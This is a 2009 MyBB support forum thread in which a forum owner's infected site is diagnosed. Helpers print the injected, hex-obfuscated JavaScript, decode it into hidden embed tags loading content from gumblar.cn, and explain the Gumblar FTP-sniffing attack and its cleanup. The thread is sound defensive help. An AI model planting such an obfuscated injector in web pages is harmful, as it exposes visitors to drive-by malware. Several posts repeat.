2009-05-11, 07:57 AM
Pages: 1 2
2009-05-11, 08:06 AM
it also happen to me =/
2009-05-11, 08:07 AM
what we need to do now , i really dont understand....
2009-05-11, 08:09 AM
are you using plugins?
2009-05-11, 08:11 AM
which plugines , i think i have not used any , it is all default.
Akismet (1.2.1)
Akismet is a program that helps prevent SPAM on your forum.
Created by MyBB Group Deactivate Uninstall
Dynamic Metas (1.1)
How to make money online | Earn money online | Earn money on web | Earn money from home,
Created by CrazyCat Deactivate
Hello World! (1.0)
A sample plugin that prints hello world and prepends the content of each post to 'Hello world!'
Created by MyBB Group
only this things , nothing eles i am using.
Akismet (1.2.1)
Akismet is a program that helps prevent SPAM on your forum.
Created by MyBB Group Deactivate Uninstall
Dynamic Metas (1.1)
How to make money online | Earn money online | Earn money on web | Earn money from home,
Created by CrazyCat Deactivate
Hello World! (1.0)
A sample plugin that prints hello world and prepends the content of each post to 'Hello world!'
Created by MyBB Group
only this things , nothing eles i am using.
2009-05-11, 08:57 AM
vaibhavmeswani, the link that you posted wasn't even to a MyBB page on your website. I've removed it to prevent users here downloading the malware.
This script is the problem:
Currently MyBB 1.4.6 has no known vulnerabilities. Make sure that your forum is up to date with the latest version, your folders and files are CHMOD correctly and you have secure passwords for all your server/host log in details.
If you can tell us a page that has MyBB "infected" then please post it here. Normally this is just a template, or language file, that has been comprimised and it can easily be removed.
This script is the problem:
<script>
gFQgq='d 6f 63ume 6e 74 2e 77r 69 74e( 22 3cd 69v 20 73 74 79le 3d 5c" 70osi 74i 6fn 3aa 62s 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 2d 310 30 30px 3b 20 74 6fp: 2d 3100 30p 78 3b 5c 22 3e 22 29; 64 6fc 75me 6e 74 2e 77r 69 74e 28 27 3c 65 6d 62 65 64 20 77 69 64 74 68 3d 31 30 30 20 68 65ig 68 74= 31 300 20 73 72 63= 22 68 74t 70 3a 2f/ 67 75 6db 6c 61 72 2ecn 2frs 73/ 3f 69 64 3d2 22 20typ 65 3d"a 70p 6c 69 63a 74 69 6f 6e 2f 70 64 66" 3e 3c/ 65 6d 62 65d 3e 27) 3b 64 6f 63 75m 65 6e 74 2e 77 72i 74e( 27 3c 65m 62ed 20 77 69d 74 68 3d10 30 20 68 65i 67 68 74= 31 30 30 20sr 63 3d 22 68 74tp:// 67 75 6d 62 6ca 72 2ecn 2fr 73s/ 3f 69 64 3d 33 22 3e 3c 2f 65 6d 62 65 64 3e 27 29;d 6fc 75m 65 6et.wri 74 65( 22 3c 2fd 69v 3e 22 29;';GPoX=String.fromCharCode(33+4);GYk0=gFQgq.replace(/([\s])/g,GPoX+'25');GPoX=unescape(GYk0);Eiq=unescape(GPoX);eval/**/(Eiq);
//</script>Currently MyBB 1.4.6 has no known vulnerabilities. Make sure that your forum is up to date with the latest version, your folders and files are CHMOD correctly and you have secure passwords for all your server/host log in details.
If you can tell us a page that has MyBB "infected" then please post it here. Normally this is just a template, or language file, that has been comprimised and it can easily be removed.
2009-05-11, 09:04 AM
there is not any particular page, when i type my site name and visit my site that time kasper sky pop up that deceted mesg , so can u login and solve this problem as i am not with programming background..
i just checked my version is updated or not so it is not the latest one , so i downloaded new one but how to install new version without getting my data lost. ???
i just checked my version is updated or not so it is not the latest one , so i downloaded new one but how to install new version without getting my data lost. ???
2009-05-11, 09:14 AM
Please follow the upgrade steps that can be found on the MyBB Wiki.
[Wiki: Upgrading] (Broken link, head over to docs.mybb.com instead)
[Wiki: Upgrading] (Broken link, head over to docs.mybb.com instead)
2009-05-11, 12:23 PM
The script provided decodes to this:
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");document.write('<embed width=100 height=100 src="http://gumblar.cn/rss/?id=2" type="application/pdf"></embed>');document.write('<embed width=100 height=100 src="http://gumblar.cn/rss/?id=3"></embed>');document.write("</div>");<div style="position:absolute; left:-1000px; top:-1000px;">
<embed width=100 height=100 src="http://gumblar.cn/rss/?id=2" type="application/pdf"></embed>
<embed width=100 height=100 src="http://gumblar.cn/rss/?id=3"></embed>
This has been quite common and it's called the gumblar hack. We've found that typically it's caused by the PC that being used to upload files to the website for updates, etc.
What's happening is that the PC you're using to update your website is infected and it's sniffing the FTP traffic between your PC and your website. Since FTP sends the username and password in plain text (it's not encrypted), the virus can see the login credentials, records them, and sends them to someone who plugs them into an automated program that logs into your website as you, then embeds their malscript into your site in various places. We've seen it embed in .js (javascript includes), .php (PHP files) as well as .htm and .html files.
I recommend you scan your PC in Safe Mode with AVG or Avast, clean it, then switch to using SSH and WinSCP to transfer your files. SSH/SCP does not send username and password as plain text. It encrypts your login credentials so this hack will not work any longer. Stay away from FTP!
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");document.write('<embed width=100 height=100 src="http://gumblar.cn/rss/?id=2" type="application/pdf"></embed>');document.write('<embed width=100 height=100 src="http://gumblar.cn/rss/?id=3"></embed>');document.write("</div>");<div style="position:absolute; left:-1000px; top:-1000px;">
<embed width=100 height=100 src="http://gumblar.cn/rss/?id=2" type="application/pdf"></embed>
<embed width=100 height=100 src="http://gumblar.cn/rss/?id=3"></embed>
This has been quite common and it's called the gumblar hack. We've found that typically it's caused by the PC that being used to upload files to the website for updates, etc.
What's happening is that the PC you're using to update your website is infected and it's sniffing the FTP traffic between your PC and your website. Since FTP sends the username and password in plain text (it's not encrypted), the virus can see the login credentials, records them, and sends them to someone who plugs them into an automated program that logs into your website as you, then embeds their malscript into your site in various places. We've seen it embed in .js (javascript includes), .php (PHP files) as well as .htm and .html files.
I recommend you scan your PC in Safe Mode with AVG or Avast, clean it, then switch to using SSH and WinSCP to transfer your files. SSH/SCP does not send username and password as plain text. It encrypts your login credentials so this hack will not work any longer. Stay away from FTP!
2009-05-11, 06:16 PM
ok will try this and thanks
Pages: 1 2